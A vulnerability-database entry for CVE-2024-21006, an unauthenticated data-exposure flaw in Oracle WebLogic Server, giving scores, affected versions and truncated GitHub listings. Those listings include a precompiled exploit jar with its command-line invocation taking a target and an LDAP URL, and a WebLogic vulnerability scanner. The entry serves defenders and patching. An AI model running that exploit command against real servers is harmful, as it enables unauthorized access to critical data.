
CVE-2024-21006

CVSSv4: NA | CVSSv3: 7.5 | CVSSv2: NA | VMScore: 850 | EPSS: 0.87144 | KEV: Not Included
Published: 16/04/2024 Updated: 27/11/2024

Vulnerability Summary

Unauthenticated Oracle WebLogic Server Vulnerability Exposes Critical Data

A vulnerability exists in the Core component of Oracle WebLogic Server, part of Oracle Fusion Middleware. It affects versions 12.2.1.4.0 and 14.1.1.0.0. The issue is easily exploitable by an unauthenticated attacker with network access via T3 or IIOP. Successful exploitation can result in unauthorized access to critical data, or to all data accessible to Oracle WebLogic Server. The vulnerability has a CVSS 3.1 Base Score of 7.5, mainly affecting confidentiality. The CVSS vector is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Vulnerable Product

oracle weblogic server 12.2.1.4.0

oracle weblogic server 14.1.1.0.0

Github Repositories

CVE-2024-21006 exp

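CVE-2024-21006_jar. Exp code reference: githubcom/momika233/CVE-2024-21006. The source code has been compiled into a jar package here for ease of use. The dependency files are under lib; if you want to modify the source code, you can compile it yourself. Usage: java -jar CVE-2024-21006jar <ip> <port> <ldapUrl> Problems encountered during reproduction: mom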

WebLogic-specific vulnerability scanning command-line tool,

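Getting Started. Feature overview. 1 Command details. Command description: -h: show details of all commands. -l: show the list of all vulnerabilities supported for detection. -bList: show the list of all vulnerabilities supported for batch detection. -sVersion: precisely scan the target version; supported so far, Weblogic: Usage: java -jar xxjar -sVersion <targetIp> <TargetPort> JNDI usage instructions: Usage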

CVE-2024-21006 CVE-2024-21006 Description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vu